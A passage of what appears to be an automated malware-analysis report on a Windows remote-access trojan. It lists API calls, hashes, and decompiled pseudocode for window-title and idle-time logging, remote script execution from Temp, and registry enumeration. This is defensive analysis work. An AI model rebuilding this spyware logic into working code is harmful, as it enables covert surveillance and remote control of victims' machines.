                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00409BF5), ref: 004095A9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,regopened,00415268,00410844,00415268,00415A00,00415268,00415998,00415268,004159E8,00415268,00415A10), ref: 004095FC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004159E8,00415268,00415A10), ref: 00409609
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415A10), ref: 00409616
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415A10), ref: 00409623
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00415A10), ref: 00409630
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040963D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040964A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040965A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040966A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409674
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040968C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409698
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096A1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096AA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096B3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096BC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096C5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096CE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096D7
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 004096E8
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 004096F4
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 00409700
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 0040970C
                                          • RegCloseKey.ADVAPI32(00409BF5), ref: 00409715
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,regmsg,00415268,00410848), ref: 00409737
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410848), ref: 00409741
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00410848), ref: 00409756
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00410848), ref: 0040975F
                                            • Part of subcall function 0040926A: RegQueryInfoKeyA.ADVAPI32(004095BF,?,00000000,00000000,004095BF,?,?), ref: 004092D6
                                            • Part of subcall function 0040926A: RegEnumKeyExA.ADVAPI32(004095BF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00409305
                                            • Part of subcall function 0040926A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?), ref: 0040931B
                                            • Part of subcall function 0040926A: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040932D
                                            • Part of subcall function 0040926A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,004095BF,00409BF5), ref: 0040933B
                                            • Part of subcall function 0040926A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 00409344
                                            • Part of subcall function 0040926A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 0040934D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@D@2@@0@V?$basic_string@$Hstd@@$V10@0@$V01@$??4?$basic_string@$V10@@$??0?$basic_string@V01@@V10@$??8std@@CloseD@1@@EnumInfoOpenQueryY?$basic_string@
                                          • String ID: regmsg$regopened
                                          • API String ID: 661915744-492665732
                                          • Opcode ID: 0ef7c05162cb41bc684b5b56ec50b8bb07652c3a5618f8f553b611841891aa8a
                                          • Instruction ID: 760c7205af8a56aa8fc39ec9197364d881e5bd0ec4cdde1e626b63b7fd3aa999
                                          • Opcode Fuzzy Hash: 0ef7c05162cb41bc684b5b56ec50b8bb07652c3a5618f8f553b611841891aa8a
                                          • Instruction Fuzzy Hash: 875153B1900109ABDB04FBA0ED4FDDE776CEB55304F104176FA06B2191EE7C5E988B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,?,?,?), ref: 0040D228
                                          • getenv.MSVCRT ref: 0040D234
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040D240
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D24D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D258
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D261
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040D26E
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040D27B
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040D287
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040D2A0
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040D2AD
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CC
                                          • ShellExecuteExA.SHELL32(0000003C), ref: 0040D2E9
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D31F
                                          • CloseHandle.KERNEL32(?), ref: 0040D328
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D331
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D338
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptexecd,?), ref: 0040D30D
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptsuccess,?,?,?,?,?), ref: 0040D352
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscripterr,?), ref: 0040D36A
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?), ref: 0040D380
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D389
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D392
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D39B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                          • String ID: <$@$Temp$remscripterr$remscriptexecd$remscriptsuccess
                                          • API String ID: 2271834883-3956447440
                                          • Opcode ID: ad663a8d2a633417fe1706364678858063ddc7b1f600590b5d4ecc61305022c1
                                          • Instruction ID: 40b226df9838ff9ebd93e372db10a445ae0d15efabd19c6d5a2c8874623cc937
                                          • Opcode Fuzzy Hash: ad663a8d2a633417fe1706364678858063ddc7b1f600590b5d4ecc61305022c1
                                          • Instruction Fuzzy Hash: 1F41307190011EEBDB14EFA0DD4DAEE7B78FF44305F10417AF502A21A0DBB85A89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00404077(intOrPtr __ecx) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				char _v28;
                                          				char _v44;
                                          				char _v60;
                                          				char _v76;
                                          				void* _v92;
                                          				intOrPtr _t39;
                                          				int _t41;
                                          				CHAR* _t43;
                                          				signed int _t46;
                                          				char* _t56;
                                          				char* _t57;
                                          				struct HWND__* _t87;
                                          				intOrPtr _t88;
                                          				void* _t93;
                                          
                                          				_v12 = __ecx;
                                          				while(1) {
                                          					_t39 = _v12;
                                          					if( *((char*)(_t39 + 0x38)) == 0 &&  *((char*)(_t39 + 0x39)) == 0) {
                                          						break;
                                          					}
                                          					if(( *0x415740 & 0x00000001) == 0) {
                                          						 *0x415740 =  *0x415740 | 0x00000001;
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          						E0040FCBA(E00404254);
                                          					}
                                          					Sleep(0x1f4);
                                          					_t87 = GetForegroundWindow();
                                          					_t41 = GetWindowTextLengthA(_t87);
                                          					_t89 = _t41;
                                          					_t9 = _t89 + 1; // 0x1
                                          					_t43 = _t9;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t43, 0,  &_v6);
                                          					if(_t41 == 0) {
                                          						L8:
                                          						_t88 = _v12;
                                          					} else {
                                          						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						GetWindowTextA(_t87, _t43, _t43);
                                          						_t56 =  &_v44;
                                          						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t56, 0x415748);
                                          						if(_t56 != 0) {
                                          							goto L8;
                                          						} else {
                                          							_t57 =  &_v44;
                                          							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t57);
                                          							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t57 - 1);
                                          							_t97 = _t93 - 0x10;
                                          							L0040FC1A();
                                          							L0040FC20();
                                          							_t88 = _v12;
                                          							_t93 = _t93 - 0x10 + 0x18;
                                          							E00403A9A(_t88, _t97,  &_v60,  &_v60, "\r\n[ ",  &_v44);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
                                          						}
                                          					}
                                          					_t67 = _t88;
                                          					E00405142(_t88);
                                          					if(E0040E898(_t88) < 0xea60) {
                                          						L15:
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						continue;
                                          					} else {
                                          						while( *((char*)(_t88 + 0x38)) != 0 ||  *((char*)(_t88 + 0x39)) != 0) {
                                          							_t46 = E0040E898(_t67);
                                          							if(_t46 < 0xea60) {
                                          								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
                                          								_t95 = _t93 + 0xc - 0x10;
                                          								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
                                          								L0040FC1A();
                                          								L0040FC20();
                                          								_t93 = _t93 + 0xc - 0x10 + 0x18;
                                          								E00403A9A(_t88, _t95,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
                                          								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								goto L15;
                                          							} else {
                                          								_v16 = _t46;
                                          								Sleep(0x3e8);
                                          								continue;
                                          							}
                                          							goto L17;
                                          						}
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					}
                                          					break;
                                          				}
                                          				L17:
                                          				return 0;
                                          			}

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004040B5
                                          • Sleep.KERNEL32(000001F4), ref: 004040CB
                                          • GetForegroundWindow.USER32 ref: 004040CD
                                          • GetWindowTextLengthA.USER32(00000000), ref: 004040D6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 004040EB
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004040FC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404106
                                          • GetWindowTextA.USER32 ref: 0040410E
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,00415748), ref: 0040411D
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00404132
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040413B
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00404146
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00000000,[ ,?, ]), ref: 00404165
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ]), ref: 0040416F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404184
                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?, ]), ref: 004041C9
                                          • _itoa.MSVCRT ref: 004041DB
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 004041FB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 0040420B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00404215
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                            • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                            • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404227
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404230
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404239
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404247
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_string@D@1@@V01@V01@@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                          • String ID: [ ${ User has been idle for $ ]$ minutes }
                                          • API String ID: 2152833798-3343415809
                                          • Opcode ID: 16de867c107b42ae11ad0244138e34ded14529554952528baadd8620eb8bfb8a
                                          • Instruction ID: 87bb5fb799bf3fa09b99bd2927ef5b1b1dfbc4c52e589369c19be6cb3ab50cf0
                                          • Opcode Fuzzy Hash: 16de867c107b42ae11ad0244138e34ded14529554952528baadd8620eb8bfb8a
                                          • Instruction Fuzzy Hash: 33517571900109AFDB10ABE0DC8DAEE7B78EB95314F04447AF601B31D1DB7899C5CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryInfoKeyA.ADVAPI32(004095BF,?,00000000,00000000,004095BF,?,?), ref: 004092D6
                                          • RegEnumKeyExA.ADVAPI32(004095BF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00409305
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?), ref: 0040931B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040932D
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,004095BF,00409BF5), ref: 0040933B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 00409344
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 0040934D
                                          • RegEnumValueA.ADVAPI32(004095BF,?,?,00003FFF,00000000,?,?,00002710), ref: 004093AD
                                          • _itoa.MSVCRT ref: 004093C4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?,?,004095BF,00409BF5), ref: 004093DD
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,004095BF,00409BF5), ref: 004093EF
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,004095BF,00409BF5), ref: 004093FD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004095BF,00409BF5), ref: 00409406
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004095BF,00409BF5), ref: 00409412
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?,?,?,?,?,004095BF,00409BF5), ref: 00409423
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,004095BF,00409BF5), ref: 00409432
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409440
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409449
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409455
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 0040946A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409485
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409493
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094A1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094AD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094B9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094C5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@$D@2@@0@Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$V10@@$Enum$InfoQueryV10@0@Value_itoa
                                          • String ID: [regsplt]
                                          • API String ID: 1517376382-4262303796
                                          • Opcode ID: 30431976b1ae715cd0fc3e13eb5c78d9e9581a0f57f9494c5079139dd48f7a99
                                          • Instruction ID: f30101ecd5197dc84c436124cfbb1774ebe9f78b1b9e58743e63aaff6b42f93f
                                          • Opcode Fuzzy Hash: 30431976b1ae715cd0fc3e13eb5c78d9e9581a0f57f9494c5079139dd48f7a99
                                          • Instruction Fuzzy Hash: 0471E97290011EAFDB11DBA0DD89DEEB77CFB48304F0041B6E606E2151DB749E898F64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401539
                                          • closesocket.WS2_32 ref: 00401564
                                          • ExitThread.KERNEL32 ref: 00401572
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,00415268,00000000), ref: 0040159E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004151D8,00000012,?,00415268,00000000), ref: 004015B4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,playaudio,00415268,00000000), ref: 004015C5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000), ref: 004015D2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00000000), ref: 004015DF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000), ref: 004015EC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004015F9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401609
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00401615
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401621
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040162A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401633
